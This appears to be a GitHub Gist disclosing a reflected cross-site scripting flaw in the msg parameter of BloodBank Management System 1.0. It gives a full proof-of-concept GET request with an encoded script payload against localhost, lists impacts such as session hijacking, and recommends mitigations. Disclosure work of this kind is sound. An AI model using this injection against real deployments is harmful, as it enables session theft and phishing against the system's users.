Skip to content

Instantly share code, notes, and snippets.

@higordiego
Created October 25, 2024 21:25
Show Gist options
  • Save higordiego/62ad5208270c67834d02818d6ba44126 to your computer and use it in GitHub Desktop.
Save higordiego/62ad5208270c67834d02818d6ba44126 to your computer and use it in GitHub Desktop.

Affected Version:

  • BloodBank Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: Cross-Site Scripting (XSS)
  • Severity: HIGH
  • Status: Unpatched

Vulnerable Endpoint:

  • Path: /bloodrequest.php?msg=

Vulnerability Description:

A Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the blood request functionality of the BloodBank Management System. This flaw occurs because the msg parameter is not properly sanitized before being rendered on the web page. This allows an attacker to inject malicious JavaScript code, which will be executed when the page is accessed.

Successful exploitation can lead to session hijacking, redirection to phishing sites, or unauthorized actions on behalf of the victim. Additionally, this could be exploited for social engineering attacks or to spread malware.


Proof of Concept (PoC):

Below is an example of a GET request that injects JavaScript code via the msg parameter:


GET /bloodrequest.php?msg=%3cscript%3ealert(%22xss%22)%3c%2fscript%3e%20have%20logged%20in. HTTP/1.1
Host: localhost:8080
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/login.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive

When this request is executed, the following script will be injected into the page:

<script>alert("xss")</script>

This will trigger a JavaScript alert as a demonstration of the vulnerability.


Image

Impact:

  • Session Hijacking: An attacker could steal session cookies and impersonate users.
  • Phishing Attacks: Victims could be redirected to malicious sites to steal credentials.
  • Malware Spread: Malicious scripts could be executed on the client’s browser.
  • Data Manipulation: Attackers could modify the content displayed to users.
  • Reputational Damage: Users may lose trust in the system due to malicious behavior.

Mitigation Recommendations:

  1. Input Validation and Sanitization: Sanitize all user input by escaping special characters like <, >, and ".
  2. Use HTTP Headers: Implement a Content Security Policy (CSP) to prevent script execution from unauthorized sources.
  3. Encoding Output: Properly encode dynamic content before rendering it on web pages to prevent script injection.
  4. Use Prepared Statements: Avoid dynamically building HTML with user-provided data.
  5. Security Testing: Perform regular penetration testing to identify and fix XSS vulnerabilities early.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment